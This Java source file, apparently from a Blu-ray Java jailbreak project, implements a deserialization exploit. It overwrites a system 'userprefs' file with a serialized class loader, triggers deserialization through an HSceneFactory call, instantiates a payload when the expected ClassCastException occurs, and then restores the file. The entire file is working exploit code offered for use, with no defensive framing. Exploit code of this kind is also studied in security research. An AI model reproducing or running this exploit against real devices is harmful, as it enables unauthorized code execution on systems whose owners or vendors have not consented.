/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license. See the LICENSE file for details.
 */
package com.bdjb;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import org.havi.ui.HSceneFactory;
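/**
 * Implementation of the userprefs deserialization exploit.
 *
 * <p>The serialized {@code PayloadClassLoader} resource is written over the userprefs file, the
 * {@link HSceneFactory} call that the original comments describe as triggering the deserialization
 * is made, and a plain preference array is written back afterwards so the file is left in a usable
 * state.
 */
class ExploitUserPrefsImpl implements ExploitInterface {
  /** Path of the userprefs file that is overwritten and later restored. */
  private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";

  /** Classpath resource holding the serialized {@code PayloadClassLoader}. */
  private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";

  /** Chunk size used when copying the resource to disk. */
  private static final int COPY_BUFFER_SIZE = 8192;

  /**
   * Runs the exploit.
   *
   * <p>Order of operations: (1) overwrite the userprefs file with the serialized resource, (2) call
   * {@code HSceneFactory.getInstance().getDefaultHScene()}, whose {@link ClassCastException} is
   * the expected signal that the planted object was read back, (3) on that signal instantiate the
   * payload through {@link PayloadClassLoader#newPayload()}. The userprefs file is restored in a
   * {@code finally} block, so it is rewritten even when an earlier step fails.
   *
   * @throws IllegalStateException if {@link #PAYLOAD_CLASS_LOADER_SER} is not on the classpath
   * @throws Exception if the userprefs file cannot be written or restored
   */
  public void trigger() throws Exception {
    try {
      // Overwrite userprefs with a serialized PayloadClassLoader.
      copyResourceToFile(PAYLOAD_CLASS_LOADER_SER, MNT_ADA_USERPREFS);

      // Trigger deserialization vulnerability.
      try {
        HSceneFactory.getInstance().getDefaultHScene();
      } catch (ClassCastException e) {
        // Exception expected: it is the signal that the planted object was deserialized.

        // Instantiate the payload class.
        PayloadClassLoader.getInstance().newPayload();
      }
    } finally {
      // Restore userprefs file regardless of whether the trigger succeeded.
      restoreUserPrefs(MNT_ADA_USERPREFS);
    }
  }

  /**
   * Copies the classpath resource {@code resource} to the file at {@code path}, replacing it.
   *
   * <p>Both streams are closed in {@code finally} blocks so that a failure mid-copy does not leak
   * a file handle.
   *
   * @param resource absolute classpath name of the resource to copy
   * @param path destination file path
   * @throws IllegalStateException if the resource cannot be found
   * @throws IOException if reading the resource or writing the file fails
   */
  private void copyResourceToFile(String resource, String path) throws IOException {
    InputStream in = getClass().getResourceAsStream(resource);
    if (in == null) {
      // getResourceAsStream returns null rather than throwing; fail with a clear message instead
      // of a NullPointerException on the first read().
      throw new IllegalStateException("Missing resource: " + resource);
    }
    try {
      OutputStream out = new FileOutputStream(path);
      try {
        byte[] buf = new byte[COPY_BUFFER_SIZE];
        int read;
        while ((read = in.read(buf)) != -1) {
          out.write(buf, 0, read);
        }
      } finally {
        out.close();
      }
    } finally {
      in.close();
    }
  }

  /**
   * Rewrites {@code path} with a minimal serialized preference array.
   *
   * <p>The array shape (9 slots, slot 3 = {@code {"26"}}) is carried over unchanged from the
   * original code; what the slot means is not documented here.
   *
   * @param path file path to rewrite
   * @throws IOException if the file cannot be written
   */
  private void restoreUserPrefs(String path) throws IOException {
    String[][] preferences = new String[9][];
    preferences[3] = new String[] {"26"};

    ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(path));
    try {
      out.writeObject(preferences);
    } finally {
      // Close even if writeObject fails so the handle is not leaked.
      out.close();
    }
  }
}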